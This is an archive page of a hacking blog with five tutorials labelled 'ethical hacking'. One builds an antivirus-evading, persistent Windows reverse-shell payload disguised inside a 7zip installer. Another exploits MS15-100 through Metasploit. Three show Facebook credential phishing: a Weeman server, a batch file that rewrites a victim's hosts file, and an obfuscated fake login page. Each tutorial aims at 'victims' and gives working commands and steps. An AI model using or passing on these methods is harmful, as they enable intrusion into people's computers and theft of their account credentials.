Category: Gaining Access

Posted on by 19 Comments

Beginners guide to hacking Windows

Hello aspiring Ethical Hackers. Today we will learn about a payload generator that I used in hacking Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP, it can only be done by sending payloads in portable executables. The biggest challenge in sending these malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules is a special payload generator for hacking Windows that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone https://github.com/EgeBalci/Hercules to clone Hercules into Kali Linux.

Hercules1

The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.

Hercules2

Now type command go build HERCULES.goto build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.

Hercules3

Now its time to create our payload. Type command,

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic

Let me explain this command.

192.168.25.146 – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.

hacking windows 10

Our payload’s name is payload.exe. Type “ls” as shown below. Now send this file to our victim using your creativity.

Hercules5

On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.

Hercules6

Type command helpto see all the commands we can execute on our target system.

Hercules7

For example, type command systeminfoto see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.

Hercules8

So let’s add a little bit reality to our payload this time. Now we will add two things : persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.

Hercules9

So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).

Hercules10

When the user clicks on “yes”, the installation will progress normally on the victim’s system.

Hercules11

And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back. Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.

Hercules12

That was all about hacking Windows 10 with Hercules Payload Generator.

Posted on by 2 Comments

How to phish with Weeman HTTP Server

Good morning friends. Today I will go back to the topic which sparked my interest in the starting days of blogging: phishing. Phishing is one of the most popular hacking attacks even today. Earlier we have seen howto’s on phishing and Desktop phishing. Today we will see how to phish with Weeman Http server.

Weeman Http server is a simple server for phishing written in Python. So let us see how to phish with Weeman HTTP server. We will use Kali Linux as our attacker system. Download Weeman HTTP server from Github in Kali.

Weeman1

Go to the directory where the server is installed and check its contents. There should be a python script named weeman.py.

Weeman2

Now start the server by typing command “./weeman.py“. It should look like below.

Weeman3

Check all the options by typing command “help“.

Weeman4

We will use the default settings for this how to. Type command “show“. You can see all the options required for phishing.

Weeman5

Set the url option as the website you want to phish. For this howto, I am using Facebook (sorry Mark). Set the port appropriately( but use 80 ). The action_url option sets the page you want the victim to redirect after entering his credentials. This sis shown below.

Weeman6

Type command “run” to run our server. The server will start as shown below.

Weeman6 1

Now find out your IP address, obfuscate it, shorten it( this is shown in the video ) and send the link to the victim. When the user clicks on the link, he will get to our phishing page as shown below.

Weeman7

When the user enters his credentials and clicks on Login, he will be redirected to the original website.

Weeman8

While on our attacker system, we can see the credentials of our victim. Happy hacking.

Weeman9
Posted on by 2 Comments

Using MS15-100 vulnerability to hack Windows

Hello aspiring ethical hackers. In this howto, we will see how to hack Windows 7 with MS15-100 with recently released ms15-100 Microsoft Windows Media Center MCL exploit. For this, I am gonna use pentest lab i created in our previous howto. I am using Kali Linux as my attacker system for hacking windows 7.

Start Metasploit by typing command “msfconsole”. Search for our exploit using command as shown below.

hack windows 7

Load the exploit as shown below.

Ms15 100b

Set the IP address of Kali Linux to “srvhost” option. Set payload as “windows/meterpreter/reverse_tcp“. Set Lhost as IP address of Kali Linux.

Ms15 100c

Check if all the necessary options are set by typing command “show options“. Now run the exploit by typing command “exploit“. You will get the following result. Now copy the underlined link and send it to your victim.

Ms15 100d

When your victim clicks on the link, he will get a popup asking him to download and save the file.

Ms15 100e

When the user clicks on the downloaded file, we will get a meterpreter session on our attacker system as shown below. Type command “sessions -l ” to see the available sessions. We have one session available below.

Ms15 100f

Type command “sessions -i 1“( 1 is the session number available to us and can vary for you) to use the meterpreter session. Type “sysinfo” to know about the target system. Hurrah, we have successfully hacked our target.

Ms15 100g

That’s how we hack Windows 7 with MS15-100 exploit.

Posted on by 1 Comment

Desktop phishing tutorial: Step by step guide

Hello aspiring ethical hackers. In our previous blogpost, you learnt about phishing. In this blogpost, you will learn about Desktop phishing.

What is Desktop phishing?

Desktop phishing is the same as phishing, the only difference being in the method hosting the files required for phishing. Whereas in phishing we upload our files to an external server, in desktop phishing we upload our files to the web server installed on our own desktop. Desktop phishing overcomes three disadvantages present in the traditional method of phishing.

One, however hard we may try, the URL will always looks suspicious in traditional method of phishing.

Dphish1

Two, modern day browsers are capable of detecting phishing sites.

Dpish2

Three, as soon as the webhosting provider detects that you are hosting a phishing webpage, he will suspend your account. This will most likely happen within 24 hours. Desktop phishing overcomes all these defects. So now, let’s see how to desktop phish. As already told, desktop phishing is same as traditional phishing, until the creation of phishing files which you can find here.Now Install Wamp Server on your Windows machine. Next, install a VPN on your system to keep your IP static. See here. We are going to host our phishing files on our desktop and redirect the victim to our site.

Copy our phishing files to the folder C:/wamp/www. This is the root directory of the Wamp server.

Dpish3

Here is the script of the “phish.php” we used.

Dpish3a

Go to folder “C:/wamp/bin/apache/Apache 2.4.4/conf” and make changes to the ‘httpd.conf’ file as below. These changes give permission to external users to access your fake website.

Dpish4

Start your wamp server, open your browser and type localhost” in the url to see if your phishing site is working. Then open Notepad and create a batch file as shown below. We need to send this file to the victim machine and make him execute it. See how? Make sure you replace the IP address below with one assigned by VPN.

Dpish5

What the above script does is it changes the hosts file in the victim’s system to redirect to your fake website when user tries to access Facebook. Now, what is hosts file?

Hosts file is a text file located in the folder “C:/windows/system32/drivers/etc” which resolves IP addresses associated with domain names.

Dpish6

Usually when we try to visit any website say www.google.com our system sends a query for it’s IP address to the DNS server. When we make an entry in the hosts file of our computer, the query is not sent to the DNS server. When the victim clicks on the executable sent by us, it changes the hosts file like below.

Dpish7

Now when victim types “www.facebook.com” in his browser, he is redirected to our wamp server. Notice that the URL looks completely genuine and the browser didn’t detect it as a phishing site.

desktop phishing tutorial

When the unsuspecting victim enters his credentials,

Dpish9

a text file called pass .txt is created in the www directory.

Dpish10

Open the file and we can see the credentials.

Dpish11

That’s all in desktop phishing tutorial for beginners. See how to phish with Weeman Http server.

Posted on by 30 Comments

Beginners guide to phishing

Hello, aspiring ethical hackers. In our previous article, you learnt what is social engineering. In this article, you will learn in detail about Phishing. Phishing is one of the most popular social engineering techniques. What exactly is phishing? Phishing is an act of presenting a fake page resembling the original webpage you intend to visit with the sole intention of stealing your credentials. This post demonstrates phishing tutorial for beginners. Although we make a phishing page of Facebook in this tutorial, it can be used to make a phishing page of any website. So now let’s phish.

Open your browser, go to the Facebook website, Right click on the webpage and click on “view page source”.

Phish1

The source of the web page is displayed in the browser. Right click on the page and click on “Save As”. Save the page as “index.html”on your computer.

Phish2

Now open index.html using notepad and hit CTRL+F”.In the Find box opened, type “action” and click on “Find Next”. Look at the value of action. This “action” specifies the website what to do after users enter credentials and submit those.

Phish3

Now change the value of action to “phish.php”. We are doing this so when the user enters his credentials the page that loads will be “phish.php” and not the usual page Facebook loads.

Phish4

Now let’s create the page phish.php. Open Notepad and type the following script into it and save it as “phish.php”. What this script does is it logs the user credentials and saves it to a file named “pass.txt”.

Phish5

Now our files are ready. Next step is to upload these files to any free web hosting site available on the internet. Google for free web hosting sites, select any one of them(I selected bytehost7), create an account with username as close to Facebook as possible and delete the index.html file available in the htdocs folder. Then using Online File Management upload your own index.html and phish.php files to the htdocs folder. Your htdocs folder will look like below.

Phish6

Let’s check if our phishing page is ready by typing the address of our site. If the page is like below, then our phishing page is working.

Phish7

The next thing we have to do is to send address of our fake website to the victim. We will do this through sending him an email but in order for the victim not to smell something fishy, we will obfuscate the URL of the fake page we are about to send him. The sending email address should be as convincingly close to Facebook as possible.

Phish8

When the victim clicks on the obfuscated URL, it will bring him to our fake site.

Phish9

If the victim is not cautious enough as to observing the URL and enters his username and password, our attempt is a success. To show this, I will enter random values in both username field and password field and hit Enter.

phishing tutorial

Now a txt file with name pass.txt will be created in the htdocs folder containing both the username and the password.

Phish11

Click on the file. We can see both the email and the password i have entered. The email is “don’t get hacked” and the password is “like me”.

Phish12

See how to phish with Weeman HTTP Server and GoPhish.